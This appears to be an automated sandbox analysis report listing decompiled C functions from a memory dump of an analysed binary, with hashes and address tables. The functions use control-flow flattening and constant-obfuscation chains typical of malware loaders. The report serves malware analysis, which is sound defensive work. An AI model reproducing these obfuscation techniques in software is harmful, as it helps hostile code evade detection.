                                                                                                                                                                                                                    0x00a6b343
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @e
                                                                                                                                                                                                                    • API String ID: 0-2356725805
                                                                                                                                                                                                                    • Opcode ID: bbb8a8cf63d5497b556e201abf3c13c33ee35b6a34f05628a6bc5044b474e5e3
                                                                                                                                                                                                                    • Instruction ID: 6a4b5298debc38f0cb9ea891de443b0a1290b77a828a88082f4429844a6f5450
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbb8a8cf63d5497b556e201abf3c13c33ee35b6a34f05628a6bc5044b474e5e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 096161B110C3429BC348CF66C98581FBBF6FBC8758F504A0DF586962A0D771CA898F96
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                                                                                    			E00A6EBA2() {
                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                                                                                    				intOrPtr _t102;
                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                    				intOrPtr _t120;
                                                                                                                                                                                                                    				signed int _t122;
                                                                                                                                                                                                                    				signed int _t123;
                                                                                                                                                                                                                    				signed int _t124;
                                                                                                                                                                                                                    				signed int* _t127;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t127 =  &_v40;
                                                                                                                                                                                                                    				_v28 = 0xfbb1e2;
                                                                                                                                                                                                                    				_v28 = _v28 * 0x2c;
                                                                                                                                                                                                                    				_v28 = _v28 | 0x9a8fd3bb;
                                                                                                                                                                                                                    				_t109 = 0xe27a578;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xbbc11242;
                                                                                                                                                                                                                    				_v32 = 0x1dc7bc;
                                                                                                                                                                                                                    				_v32 = _v32 << 0x10;
                                                                                                                                                                                                                    				_v32 = _v32 + 0xffff2229;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0xc7b5affc;
                                                                                                                                                                                                                    				_v8 = 0xf1703;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff265f;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x0002e302;
                                                                                                                                                                                                                    				_v12 = 0x98bed6;
                                                                                                                                                                                                                    				_t122 = 0x6b;
                                                                                                                                                                                                                    				_v12 = _v12 / _t122;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000ff9b2;
                                                                                                                                                                                                                    				_v40 = 0x1a625b;
                                                                                                                                                                                                                    				_t123 = 0x30;
                                                                                                                                                                                                                    				_v40 = _v40 * 0x41;
                                                                                                                                                                                                                    				_v40 = _v40 >> 3;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffffb0df;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x00db52cd;
                                                                                                                                                                                                                    				_v16 = 0x3a7bf3;
                                                                                                                                                                                                                    				_v16 = _v16 | 0xb7903432;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xa7e6;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xb7b75786;
                                                                                                                                                                                                                    				_v20 = 0xede387;
                                                                                                                                                                                                                    				_v20 = _v20 + 0x48a3;
                                                                                                                                                                                                                    				_v20 = _v20 / _t123;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x000ca3aa;
                                                                                                                                                                                                                    				_v36 = 0x78572c;
                                                                                                                                                                                                                    				_v36 = _v36 >> 6;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xf23370e8;
                                                                                                                                                                                                                    				_t124 = 0x1a;
                                                                                                                                                                                                                    				_v36 = _v36 / _t124;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x09542bae;
                                                                                                                                                                                                                    				_v4 = 0xafd584;
                                                                                                                                                                                                                    				_v4 = _v4 + 0xffff77cc;
                                                                                                                                                                                                                    				_v4 = _v4 ^ 0x00a810db;
                                                                                                                                                                                                                    				_v24 = 0x90ce4a;
                                                                                                                                                                                                                    				_v24 = _v24 | 0xf67bdef1;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0xf6f00942;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t109 != 0x6819750) {
                                                                                                                                                                                                                    						if(_t109 == 0x9f0f7e7) {
                                                                                                                                                                                                                    							_push(_t109);
                                                                                                                                                                                                                    							_t102 = E00A6E1AF(_t109, _v8, _v12, _v40);
                                                                                                                                                                                                                    							_t120 =  *0xa8320c;
                                                                                                                                                                                                                    							_t127 =  &(_t127[5]);
                                                                                                                                                                                                                    							_t109 = 0x6819750;
                                                                                                                                                                                                                    							 *((intOrPtr*)(_t120 + 0x38)) = _t102;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t109 == 0xe27a578) {
                                                                                                                                                                                                                    								_t120 = E00A7C6D9(0x44);
                                                                                                                                                                                                                    								_t109 = 0x9f0f7e7;
                                                                                                                                                                                                                    								 *0xa8320c = _t120;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t101 = E00A646D0(_v16, _t109, 0, _v20, _v36, _v4, _t109, _v24, _t109, E00A61EC4);
                                                                                                                                                                                                                    					_t127 =  &(_t127[9]);
                                                                                                                                                                                                                    					_t109 = 0x80f5322;
                                                                                                                                                                                                                    					 *((intOrPtr*)( *0xa8320c + 0x30)) = _t101;
                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                    				} while (_t109 != 0x80f5322);
                                                                                                                                                                                                                    				return 0 | _t120 != 0x00000000;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a6eba2
                                                                                                                                                                                                                    0x00a6eba5
                                                                                                                                                                                                                    0x00a6ebb8
                                                                                                                                                                                                                    0x00a6ebc1
                                                                                                                                                                                                                    0x00a6ebc9
                                                                                                                                                                                                                    0x00a6ebcb
                                                                                                                                                                                                                    0x00a6ebd8
                                                                                                                                                                                                                    0x00a6ebe5
                                                                                                                                                                                                                    0x00a6ebea
                                                                                                                                                                                                                    0x00a6ebf2
                                                                                                                                                                                                                    0x00a6ebfa
                                                                                                                                                                                                                    0x00a6ec02
                                                                                                                                                                                                                    0x00a6ec0a
                                                                                                                                                                                                                    0x00a6ec12
                                                                                                                                                                                                                    0x00a6ec20
                                                                                                                                                                                                                    0x00a6ec25
                                                                                                                                                                                                                    0x00a6ec29
                                                                                                                                                                                                                    0x00a6ec31
                                                                                                                                                                                                                    0x00a6ec40
                                                                                                                                                                                                                    0x00a6ec43
                                                                                                                                                                                                                    0x00a6ec47
                                                                                                                                                                                                                    0x00a6ec4c
                                                                                                                                                                                                                    0x00a6ec54
                                                                                                                                                                                                                    0x00a6ec5c
                                                                                                                                                                                                                    0x00a6ec64
                                                                                                                                                                                                                    0x00a6ec6c
                                                                                                                                                                                                                    0x00a6ec74
                                                                                                                                                                                                                    0x00a6ec7c
                                                                                                                                                                                                                    0x00a6ec84
                                                                                                                                                                                                                    0x00a6ec94
                                                                                                                                                                                                                    0x00a6ec98
                                                                                                                                                                                                                    0x00a6eca0
                                                                                                                                                                                                                    0x00a6eca8
                                                                                                                                                                                                                    0x00a6ecad
                                                                                                                                                                                                                    0x00a6ecb9
                                                                                                                                                                                                                    0x00a6ecc1
                                                                                                                                                                                                                    0x00a6ecc5
                                                                                                                                                                                                                    0x00a6eccd
                                                                                                                                                                                                                    0x00a6ecd5
                                                                                                                                                                                                                    0x00a6ecdd
                                                                                                                                                                                                                    0x00a6ece5
                                                                                                                                                                                                                    0x00a6eced
                                                                                                                                                                                                                    0x00a6ecf5
                                                                                                                                                                                                                    0x00a6ed03
                                                                                                                                                                                                                    0x00a6ed03
                                                                                                                                                                                                                    0x00a6ed09
                                                                                                                                                                                                                    0x00a6ed2b
                                                                                                                                                                                                                    0x00a6ed39
                                                                                                                                                                                                                    0x00a6ed3e
                                                                                                                                                                                                                    0x00a6ed44
                                                                                                                                                                                                                    0x00a6ed47
                                                                                                                                                                                                                    0x00a6ed49
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ed0b
                                                                                                                                                                                                                    0x00a6ed0d
                                                                                                                                                                                                                    0x00a6ed1f
                                                                                                                                                                                                                    0x00a6ed21
                                                                                                                                                                                                                    0x00a6ed23
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ed23
                                                                                                                                                                                                                    0x00a6ed0d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6ed09
                                                                                                                                                                                                                    0x00a6ed6c
                                                                                                                                                                                                                    0x00a6ed77
                                                                                                                                                                                                                    0x00a6ed7a
                                                                                                                                                                                                                    0x00a6ed7c
                                                                                                                                                                                                                    0x00a6ed7f
                                                                                                                                                                                                                    0x00a6ed7f
                                                                                                                                                                                                                    0x00a6ed91

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,Wx
                                                                                                                                                                                                                    • API String ID: 0-1697797131
                                                                                                                                                                                                                    • Opcode ID: 0f77b11ac7d0ae00e7e834c94afbca494dde6396d98731ce6a2888cb62b0f0a7
                                                                                                                                                                                                                    • Instruction ID: a5d1b049c616dd85642ee84d99d1ca828c49bd744b633562874f63186c70be00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f77b11ac7d0ae00e7e834c94afbca494dde6396d98731ce6a2888cb62b0f0a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8517CB15083019FC748DF25D88940FBBF2FBD8718F14891DF1959A260D3B0CA4A8F82
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A631E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                    				signed int _t96;
                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                    				void* _t116;
                                                                                                                                                                                                                    				void* _t117;
                                                                                                                                                                                                                    				void* _t119;
                                                                                                                                                                                                                    				void* _t120;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t116 = __ecx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t82);
                                                                                                                                                                                                                    				_v40 = 0x2db8cc;
                                                                                                                                                                                                                    				_t120 = _t119 + 0x10;
                                                                                                                                                                                                                    				_v40 = _v40 | 0x81c30636;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x81ee8862;
                                                                                                                                                                                                                    				_t117 = 0;
                                                                                                                                                                                                                    				_v60 = 0x5dc520;
                                                                                                                                                                                                                    				_t100 = 0x4c2bed0;
                                                                                                                                                                                                                    				_v60 = _v60 | 0xef56bff5;
                                                                                                                                                                                                                    				_t96 = 0x2b;
                                                                                                                                                                                                                    				_v60 = _v60 / _t96;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x059c1b4a;
                                                                                                                                                                                                                    				_v52 = 0xdfa559;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffff65f1;
                                                                                                                                                                                                                    				_v52 = _v52 + 0xffffd9ed;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x00d2978e;
                                                                                                                                                                                                                    				_v56 = 0xab6ce5;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xc5625fe8;
                                                                                                                                                                                                                    				_v56 = _v56 | 0x7e1269db;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0xffd60a4d;
                                                                                                                                                                                                                    				_v64 = 0xec0af9;
                                                                                                                                                                                                                    				_v64 = _v64 >> 2;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff1818;
                                                                                                                                                                                                                    				_t97 = 0x23;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x2d;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x0a3f61a9;
                                                                                                                                                                                                                    				_v44 = 0x94f535;
                                                                                                                                                                                                                    				_v44 = _v44 / _t97;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000e3b16;
                                                                                                                                                                                                                    				_v32 = 0xe8487f;
                                                                                                                                                                                                                    				_v32 = _v32 | 0xc57c20b9;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0xc5fd39bf;
                                                                                                                                                                                                                    				_v36 = 0xde1ed4;
                                                                                                                                                                                                                    				_v36 = _v36 >> 3;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x001831e2;
                                                                                                                                                                                                                    				_v48 = 0xefcbf8;
                                                                                                                                                                                                                    				_v48 = _v48 >> 0xb;
                                                                                                                                                                                                                    				_v48 = _v48 + 0xffff9663;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0xfff88a58;
                                                                                                                                                                                                                    				while(_t100 != 0x4c2bed0) {
                                                                                                                                                                                                                    					if(_t100 == 0x96b62d2) {
                                                                                                                                                                                                                    						E00A773B3(_v40, _v60,  &_v28, _a4, _v52, _v56);
                                                                                                                                                                                                                    						_t120 = _t120 + 0x10;
                                                                                                                                                                                                                    						_t100 = 0xbde0381;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t100 == 0xa736759) {
                                                                                                                                                                                                                    							__eflags = E00A7223A(_v32,  &_v28, __eflags, _t116 + 4, _v36, _v48);
                                                                                                                                                                                                                    							_t117 =  !=  ? 1 : _t117;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t100 != 0xbde0381) {
                                                                                                                                                                                                                    								L9:
                                                                                                                                                                                                                    								__eflags = _t100 - 0x3c62b99;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(E00A629F1(_v64, _v44,  &_v28, _t116) != 0) {
                                                                                                                                                                                                                    									_t100 = 0xa736759;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t117;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t100 = 0x96b62d2;
                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a631eb
                                                                                                                                                                                                                    0x00a631ef
                                                                                                                                                                                                                    0x00a631f1
                                                                                                                                                                                                                    0x00a631f5
                                                                                                                                                                                                                    0x00a631f6
                                                                                                                                                                                                                    0x00a631f7
                                                                                                                                                                                                                    0x00a631fc
                                                                                                                                                                                                                    0x00a63204
                                                                                                                                                                                                                    0x00a63207
                                                                                                                                                                                                                    0x00a63211
                                                                                                                                                                                                                    0x00a63219
                                                                                                                                                                                                                    0x00a6321b
                                                                                                                                                                                                                    0x00a63223
                                                                                                                                                                                                                    0x00a63228
                                                                                                                                                                                                                    0x00a6323b
                                                                                                                                                                                                                    0x00a63240
                                                                                                                                                                                                                    0x00a63246
                                                                                                                                                                                                                    0x00a6324e
                                                                                                                                                                                                                    0x00a63256
                                                                                                                                                                                                                    0x00a6325e
                                                                                                                                                                                                                    0x00a63266
                                                                                                                                                                                                                    0x00a6326e
                                                                                                                                                                                                                    0x00a63276
                                                                                                                                                                                                                    0x00a6327e
                                                                                                                                                                                                                    0x00a63286
                                                                                                                                                                                                                    0x00a6328e
                                                                                                                                                                                                                    0x00a63296
                                                                                                                                                                                                                    0x00a6329b
                                                                                                                                                                                                                    0x00a632a8
                                                                                                                                                                                                                    0x00a632a9
                                                                                                                                                                                                                    0x00a632ad
                                                                                                                                                                                                                    0x00a632b5
                                                                                                                                                                                                                    0x00a632c8
                                                                                                                                                                                                                    0x00a632cc
                                                                                                                                                                                                                    0x00a632d4
                                                                                                                                                                                                                    0x00a632dc
                                                                                                                                                                                                                    0x00a632e4
                                                                                                                                                                                                                    0x00a632ec
                                                                                                                                                                                                                    0x00a632f4
                                                                                                                                                                                                                    0x00a632f9
                                                                                                                                                                                                                    0x00a63301
                                                                                                                                                                                                                    0x00a63309
                                                                                                                                                                                                                    0x00a6330e
                                                                                                                                                                                                                    0x00a63316
                                                                                                                                                                                                                    0x00a6331e
                                                                                                                                                                                                                    0x00a63328
                                                                                                                                                                                                                    0x00a6336c
                                                                                                                                                                                                                    0x00a63371
                                                                                                                                                                                                                    0x00a63374
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6332a
                                                                                                                                                                                                                    0x00a6332c
                                                                                                                                                                                                                    0x00a633a6
                                                                                                                                                                                                                    0x00a633a8
                                                                                                                                                                                                                    0x00a6332e
                                                                                                                                                                                                                    0x00a63334
                                                                                                                                                                                                                    0x00a6337d
                                                                                                                                                                                                                    0x00a6337d
                                                                                                                                                                                                                    0x00a63383
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63385
                                                                                                                                                                                                                    0x00a63336
                                                                                                                                                                                                                    0x00a6334d
                                                                                                                                                                                                                    0x00a6334f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6334f
                                                                                                                                                                                                                    0x00a6334d
                                                                                                                                                                                                                    0x00a63334
                                                                                                                                                                                                                    0x00a6332c
                                                                                                                                                                                                                    0x00a633b4
                                                                                                                                                                                                                    0x00a633b4
                                                                                                                                                                                                                    0x00a6337b
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: Ygs
                                                                                                                                                                                                                    • API String ID: 0-1042186682
                                                                                                                                                                                                                    • Opcode ID: 42d710b12d408f183a28a49b17e73b020d9163edb8d7a83aee51ee862419b59c
                                                                                                                                                                                                                    • Instruction ID: 656f10ce9b16f9bd96e31f43e29ec1ff13a3583cff78ee0bffe9a668ee572a19
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42d710b12d408f183a28a49b17e73b020d9163edb8d7a83aee51ee862419b59c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D419C721093459FCB58CF22898681FBBF5FBD8758F105A1DF5869A221D770CA0ACB87
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A74E55(intOrPtr* __ecx) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				char _v308;
                                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                                    				void* _t112;
                                                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                                                                    				char* _t116;
                                                                                                                                                                                                                    				intOrPtr* _t132;
                                                                                                                                                                                                                    				void* _t133;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v16 = 0xb485dd;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xea84;
                                                                                                                                                                                                                    				_v16 = _v16 + 0x7bfe;
                                                                                                                                                                                                                    				_v16 = _v16 | 0xc02ab43c;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xc0b76fa0;
                                                                                                                                                                                                                    				_v32 = 0xeed7e9;
                                                                                                                                                                                                                    				_v32 = _v32 << 0xe;
                                                                                                                                                                                                                    				_t132 = __ecx;
                                                                                                                                                                                                                    				_v32 = _v32 * 0x66;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x81b411b8;
                                                                                                                                                                                                                    				_v48 = 0x6fd01c;
                                                                                                                                                                                                                    				_v48 = _v48 << 1;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x00d8ee58;
                                                                                                                                                                                                                    				_v24 = 0x97113a;
                                                                                                                                                                                                                    				_t114 = 0x52;
                                                                                                                                                                                                                    				_v24 = _v24 / _t114;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x06572d64;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0658f575;
                                                                                                                                                                                                                    				_v40 = 0xee1989;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xead5dc4b;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xeaf56572;
                                                                                                                                                                                                                    				_v36 = 0x2f7683;
                                                                                                                                                                                                                    				_v36 = _v36 >> 6;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff1fcb;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0xfff27aec;
                                                                                                                                                                                                                    				_v44 = 0x597bb;
                                                                                                                                                                                                                    				_v44 = _v44 | 0x735e455b;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x735529cd;
                                                                                                                                                                                                                    				_v28 = 0xf67d81;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xef33;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xffff6a02;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00f56e71;
                                                                                                                                                                                                                    				_v8 = 0x936314;
                                                                                                                                                                                                                    				_t115 = 0x5d;
                                                                                                                                                                                                                    				_t116 =  &_v308;
                                                                                                                                                                                                                    				_v8 = _v8 / _t115;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff5911;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xe34d;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x000eabe5;
                                                                                                                                                                                                                    				_v20 = 0xc73bbb;
                                                                                                                                                                                                                    				_v20 = _v20 + 0x76f2;
                                                                                                                                                                                                                    				_v20 = _v20 | 0xfa57ff71;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xfad0424e;
                                                                                                                                                                                                                    				_v12 = 0x69918;
                                                                                                                                                                                                                    				_v12 = _v12 | 0xc4632299;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xb;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xf;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000b4cdc;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					_t106 =  *_t132;
                                                                                                                                                                                                                    					if(_t106 == 0) {
                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t106 == 0x2e) {
                                                                                                                                                                                                                    						 *_t116 = 0;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						 *_t116 = _t106;
                                                                                                                                                                                                                    						_t116 = _t116 + 1;
                                                                                                                                                                                                                    						_t132 = _t132 + 1;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                    					_t133 = E00A65FBC( &_v308, _v16, _v32);
                                                                                                                                                                                                                    					if(_t133 != 0) {
                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                    						_t108 = E00A7D454(_v36, _v44, _v28, _v8);
                                                                                                                                                                                                                    						_push(_t133);
                                                                                                                                                                                                                    						_push(_t108 ^ 0x196cc427);
                                                                                                                                                                                                                    						return E00A71948(_v20, _v12);
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t112 = E00A78C20(_v48, _v24,  &_v308, _v40);
                                                                                                                                                                                                                    					_t133 = _t112;
                                                                                                                                                                                                                    					if(_t133 != 0) {
                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t112;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                    0x00a74e5e
                                                                                                                                                                                                                    0x00a74e67
                                                                                                                                                                                                                    0x00a74e6e
                                                                                                                                                                                                                    0x00a74e75
                                                                                                                                                                                                                    0x00a74e7c
                                                                                                                                                                                                                    0x00a74e83
                                                                                                                                                                                                                    0x00a74e8a
                                                                                                                                                                                                                    0x00a74e96
                                                                                                                                                                                                                    0x00a74e98
                                                                                                                                                                                                                    0x00a74e9b
                                                                                                                                                                                                                    0x00a74ea2
                                                                                                                                                                                                                    0x00a74ea9
                                                                                                                                                                                                                    0x00a74eac
                                                                                                                                                                                                                    0x00a74eb3
                                                                                                                                                                                                                    0x00a74ebd
                                                                                                                                                                                                                    0x00a74ec2
                                                                                                                                                                                                                    0x00a74ec7
                                                                                                                                                                                                                    0x00a74ece
                                                                                                                                                                                                                    0x00a74ed5
                                                                                                                                                                                                                    0x00a74edc
                                                                                                                                                                                                                    0x00a74ee3
                                                                                                                                                                                                                    0x00a74eea
                                                                                                                                                                                                                    0x00a74ef1
                                                                                                                                                                                                                    0x00a74ef5
                                                                                                                                                                                                                    0x00a74efc
                                                                                                                                                                                                                    0x00a74f03
                                                                                                                                                                                                                    0x00a74f0a
                                                                                                                                                                                                                    0x00a74f11
                                                                                                                                                                                                                    0x00a74f18
                                                                                                                                                                                                                    0x00a74f1f
                                                                                                                                                                                                                    0x00a74f26
                                                                                                                                                                                                                    0x00a74f2d
                                                                                                                                                                                                                    0x00a74f34
                                                                                                                                                                                                                    0x00a74f3e
                                                                                                                                                                                                                    0x00a74f41
                                                                                                                                                                                                                    0x00a74f47
                                                                                                                                                                                                                    0x00a74f4a
                                                                                                                                                                                                                    0x00a74f51
                                                                                                                                                                                                                    0x00a74f58
                                                                                                                                                                                                                    0x00a74f5f
                                                                                                                                                                                                                    0x00a74f66
                                                                                                                                                                                                                    0x00a74f6d
                                                                                                                                                                                                                    0x00a74f74
                                                                                                                                                                                                                    0x00a74f7b
                                                                                                                                                                                                                    0x00a74f82
                                                                                                                                                                                                                    0x00a74f89
                                                                                                                                                                                                                    0x00a74f8d
                                                                                                                                                                                                                    0x00a74f91
                                                                                                                                                                                                                    0x00a74fa2
                                                                                                                                                                                                                    0x00a74fa2
                                                                                                                                                                                                                    0x00a74fa6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74f9c
                                                                                                                                                                                                                    0x00a74faa
                                                                                                                                                                                                                    0x00a74f9e
                                                                                                                                                                                                                    0x00a74f9e
                                                                                                                                                                                                                    0x00a74fa0
                                                                                                                                                                                                                    0x00a74fa1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a74fa1
                                                                                                                                                                                                                    0x00a74fad
                                                                                                                                                                                                                    0x00a74fbe
                                                                                                                                                                                                                    0x00a74fc3
                                                                                                                                                                                                                    0x00a74fe2
                                                                                                                                                                                                                    0x00a74ff1
                                                                                                                                                                                                                    0x00a75001
                                                                                                                                                                                                                    0x00a75002
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75008
                                                                                                                                                                                                                    0x00a74fd5
                                                                                                                                                                                                                    0x00a74fda
                                                                                                                                                                                                                    0x00a74fe0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a75010
                                                                                                                                                                                                                    0x00a75010
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
